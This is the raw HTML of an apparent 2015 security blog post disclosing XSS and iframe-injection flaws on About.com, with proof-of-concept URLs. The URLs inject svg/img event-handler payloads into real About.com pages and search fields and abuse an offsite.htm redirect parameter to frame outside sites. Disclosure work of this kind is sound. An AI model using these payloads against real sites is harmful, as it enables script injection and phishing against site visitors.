<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLMeJ9WaQQA1UJyG4Jxf6D5b7I6PWZyKjoe2dhex3fL78N6ZQXR-fQgq_WLnY9kqembCj1muQq2yj4R2oQo1r7cUTC1Ss2z4rMDve_elQGaj4_qmkHYK9AhLfBkJFhXZzq6XZcO6UZhI/s1600/about_all_xss_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihLMeJ9WaQQA1UJyG4Jxf6D5b7I6PWZyKjoe2dhex3fL78N6ZQXR-fQgq_WLnY9kqembCj1muQq2yj4R2oQo1r7cUTC1Ss2z4rMDve_elQGaj4_qmkHYK9AhLfBkJFhXZzq6XZcO6UZhI/s400/about_all_xss_1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUVUGURAaEGDT7TdXSTMZlso18uVA9ACDAfEVG0y89M-ChZvdEZDw92dtltwna8zB0qux9xYNnw8tQ4hLLSFG4C3PGoj5HyQmiDrudeXRwSB3L5ymYyUu8y-_-hGZhi7C7NXdQT5QMdJQ/s1600/about_all_xss_2.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUVUGURAaEGDT7TdXSTMZlso18uVA9ACDAfEVG0y89M-ChZvdEZDw92dtltwna8zB0qux9xYNnw8tQ4hLLSFG4C3PGoj5HyQmiDrudeXRwSB3L5ymYyUu8y-_-hGZhi7C7NXdQT5QMdJQ/s400/about_all_xss_2.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxfAENvCDlL0T-Jb5pkRmpgojgYRK2QaSr7GYOmDYkZnYkWiuNpB2UjaWZA0WD-CmU1YEzob6AQMB5J8-juOUqP7nQ8cdb-rORAdD_btX8KfVIs2hBNb5fo2MeX0DW21647HSUo2hqvU/s1600/about_all_xss_4.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxfAENvCDlL0T-Jb5pkRmpgojgYRK2QaSr7GYOmDYkZnYkWiuNpB2UjaWZA0WD-CmU1YEzob6AQMB5J8-juOUqP7nQ8cdb-rORAdD_btX8KfVIs2hBNb5fo2MeX0DW21647HSUo2hqvU/s400/about_all_xss_4.png" style="cursor: move;" width="400" /></a><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b>POC Codes, e.g.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">/"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ipod.about.com/lr/ipad_how-tos/9033" target="_blank">http://ipod.about.com/lr/ipad_<wbr></wbr>how-tos/9033</a>"><svg/onload=<wbr></wbr>alert(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bizfinance.about.com/lr/businesscredit/fl/5-Ways-to-Start-Establishing-Business-Identity-Theft-Protection.htm/" target="_blank">http://bizfinance.about.com/<wbr></wbr>lr/businesscredit/fl/5-Ways-<wbr></wbr>to-Start-Establishing-<wbr></wbr>Business-Identity-Theft-<wbr></wbr>Protection.htm/</a>"><svg/onload=<wbr></wbr>alert(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://recycling.about.com/lr/Collecting/ss/EPS-Recycling-5-Reasons-Why-and-2-Why-Not.htm/" target="_blank">http://recycling.about.com/lr/<wbr></wbr>Collecting/ss/EPS-Recycling-5-<wbr></wbr>Reasons-Why-and-2-Why-Not.htm/</a><wbr></wbr>"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://dc.about.com/lr/shopping/a/BlkFriday.htm/" target="_blank">http://dc.about.com/lr/<wbr></wbr>shopping/a/BlkFriday.htm/</a>"><<wbr></wbr>svg/onload=alert(/justqdjing/)<wbr></wbr>></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://healthtech.about.com/lr/Patient-Portals/fl/5-Ways-a-Patient-Portal-Can-Improve-Your-Health-Care-Experience.htm/" target="_blank">http://healthtech.about.com/<wbr></wbr>lr/Patient-Portals/fl/5-Ways-<wbr></wbr>a-Patient-Portal-Can-Improve-<wbr></wbr>Your-Health-Care-Experience.<wbr></wbr>htm/</a>"><svg/onload=alert(/<wbr></wbr>justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=h5yELiJBxWo&feature=youtu.be</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
</div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_2.html</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-cross-site-scripting-security-attacks/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(3) About Group About.com Main Page's Search Field XSS (Cross-Site Scripting) Security Vulnerabilities</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The web application About.com online website has a security bug problem. It can be exploited by XSS attacks.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The code programming flaw occurs at about.com main page's search field, e.g.</span></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://www.about.com/?q=googleandroidsystem" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/?q=<wbr></wbr>googleandroidsystem</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfmIogi0-v6tS4kHSF59ECAhiUtdpSFt8bk1rQGSg-51vYYxKggzJp3zdKBCyewuclM8yVDZEbDgRtoXx9GrA6_NEjSmVrFPFofI2V8-01x7QJ0KrC75C_6QWzUkn7oC2oOu2FrJcwlEA/s1600/about_search_xss1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfmIogi0-v6tS4kHSF59ECAhiUtdpSFt8bk1rQGSg-51vYYxKggzJp3zdKBCyewuclM8yVDZEbDgRtoXx9GrA6_NEjSmVrFPFofI2V8-01x7QJ0KrC75C_6QWzUkn7oC2oOu2FrJcwlEA/s400/about_search_xss1.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b>POC Codes, e.g.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"--/>"><img src=x onerror=prompt(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.about.com/?q=" target="_blank">http://www.about.com/?q=</a>"--/>"<wbr></wbr>><img src=x onerror=prompt(/justqdjing/)></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/xss-vulnerability/about-group-about-com-main-pages-search-field-xss-cross-site-scripting-security-vulnerabilities/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/</span></a></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(4) </b><b style="line-height: 19.911111831665px; text-align: justify;">About Group About.com All Topics (At least 99.88% links) Vulnerable to Iframe Injection (Cross Frame Scripting) Security Attacks</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability description:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">About Group has a security problem. It can be exploited by Iframe Injection (Cross Frame Scripting) attacks.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability occurs at about.com "offsite.htm" page with "zu" parameter, e.g.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//facebook.com/yahoo" target="_blank">http://internationalinvest.<wbr></wbr>about.com/gi/dynamic/offsite.<wbr></wbr>htm?zi=1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//facebook.com/yahoo</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Use "<a href="http://whitehatpost.blog.163.com/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/</a>" for the following test.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1sH5EgDW5ocxdmLTy5CSukN96e1unBeV-l10D4l7aZD4v8tWayNXfH8V90NihgjrYNrtULXoa3Wl7Gb6guFJ_liLQFl2hbdlyWj7V2xHvlvGtwrz2i3HyDH6jXofZ-1rUEmUxL9Nku8s/s1600/about_international_iframe_jnjection.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><br /></span></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivIyPlx1PD170CZ3bJ6__OqWFwpCXt2wpG1SehmF1lDUD9KlgkIWehXSRMnBLGfRFeJkMXHb8_awYPdhJRvJAgAIqUohNnfAABx92xDqxT3Ob-qBjgu2v1-dej_k9ayG-JT-psTrnHtXk/s1600/about_inframe_injection.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivIyPlx1PD170CZ3bJ6__OqWFwpCXt2wpG1SehmF1lDUD9KlgkIWehXSRMnBLGfRFeJkMXHb8_awYPdhJRvJAgAIqUohNnfAABx92xDqxT3Ob-qBjgu2v1-dej_k9ayG-JT-psTrnHtXk/s400/about_inframe_injection.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="clear: left; color: black; float: left; font-family: Arial, Helvetica, sans-serif; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1sH5EgDW5ocxdmLTy5CSukN96e1unBeV-l10D4l7aZD4v8tWayNXfH8V90NihgjrYNrtULXoa3Wl7Gb6guFJ_liLQFl2hbdlyWj7V2xHvlvGtwrz2i3HyDH6jXofZ-1rUEmUxL9Nku8s/s400/about_international_iframe_jnjection.png" style="cursor: move;" width="400" /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URLs:</span></b></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://homerenovations.about.com/od/fundingyourrenovation/tp/8-Remodels-That-Maximize-Curb-Appeal-For-Higher-Selling-Price.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://homerenovations.about.<wbr></wbr>com/od/fundingyourrenovation/<wbr></wbr>tp/8-Remodels-That-Maximize-<wbr></wbr>Curb-Appeal-For-Higher-<wbr></wbr>Selling-Price.htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://publishing.about.com/od/Childrens-and-YA-Books/fl/A-Literary-linkedin-Agents-ebay-Advice-Hao123-to-Childrens-and-Bing-Sohu-YA-Dailymail-Authors-Snapdeal.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://publishing.about.com/<wbr></wbr>od/Childrens-and-YA-Books/fl/<wbr></wbr>A-Literary-linkedin-Agents-<wbr></wbr>ebay-Advice-Hao123-to-<wbr></wbr>Childrens-and-Bing-Sohu-YA-<wbr></wbr>Dailymail-Authors-Snapdeal.htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://chinesefood.about.com/od/chickenrecipes/tp/chicken-stir-fry-flipkart-adobe-alipay-pork-dropbox-blogger-github-jd-chinadaily-huffingtonpost-Livedoor-Buzzfeed-Themeforest-Godaddy.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://chinesefood.about.com/<wbr></wbr>od/chickenrecipes/tp/chicken-<wbr></wbr>stir-fry-flipkart-adobe-<wbr></wbr>alipay-pork-dropbox-blogger-<wbr></wbr>github-jd-chinadaily-<wbr></wbr>huffingtonpost-Livedoor-<wbr></wbr>Buzzfeed-Themeforest-Godaddy.<wbr></wbr>htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://menshair.about.com/od/facialhair/qt/growbeard-ask-360cn-mailru-gmw-googleleadservices-bbc-pornhub-peoplecn-rakuten-nicovideo-dailymotion-1-dmm-deviantart.htm/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://menshair.about.com/od/<wbr></wbr>facialhair/qt/growbeard-ask-<wbr></wbr>360cn-mailru-gmw-<wbr></wbr>googleleadservices-bbc-<wbr></wbr>pornhub-peoplecn-rakuten-<wbr></wbr>nicovideo-dailymotion-1-dmm-<wbr></wbr>deviantart.htm/</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://jobsearch.about.com/od/coverletters/a/types-sogou-outbrain-booking-chase-pixnet-reddit-pinterest-vk-msn-imdb-of-cover-qq-letters-bankofamerica-twitter-Wikia-Etsy.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://jobsearch.about.com/od/<wbr></wbr>coverletters/a/types-sogou-<wbr></wbr>outbrain-booking-chase-pixnet-<wbr></wbr>reddit-pinterest-vk-msn-imdb-<wbr></wbr>of-cover-qq-letters-<wbr></wbr>bankofamerica-twitter-Wikia-<wbr></wbr>Etsy.htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<a href="http://testprep.about.com/od/The-Redesigned-PSAT/fl/Redesigned-PSAT-101-Flickr-Globo-Xnxx-Tudou-Yelp-Douban-Ameblo-33-Vimeo-Ettoday-Redtube-Directrev-Salesforce-Coccoc.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://testprep.about.com/od/<wbr></wbr>The-Redesigned-PSAT/fl/<wbr></wbr>Redesigned-PSAT-101-Flickr-<wbr></wbr>Globo-Xnxx-Tudou-Yelp-Douban-<wbr></wbr>Ameblo-33-Vimeo-Ettoday-<wbr></wbr>Redtube-Directrev-Salesforce-<wbr></wbr>Coccoc.htm</span></a></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div style="margin: 0px;">
<a href="http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com</span></a></div>
</div>
<div>
<div style="margin: 0px;">
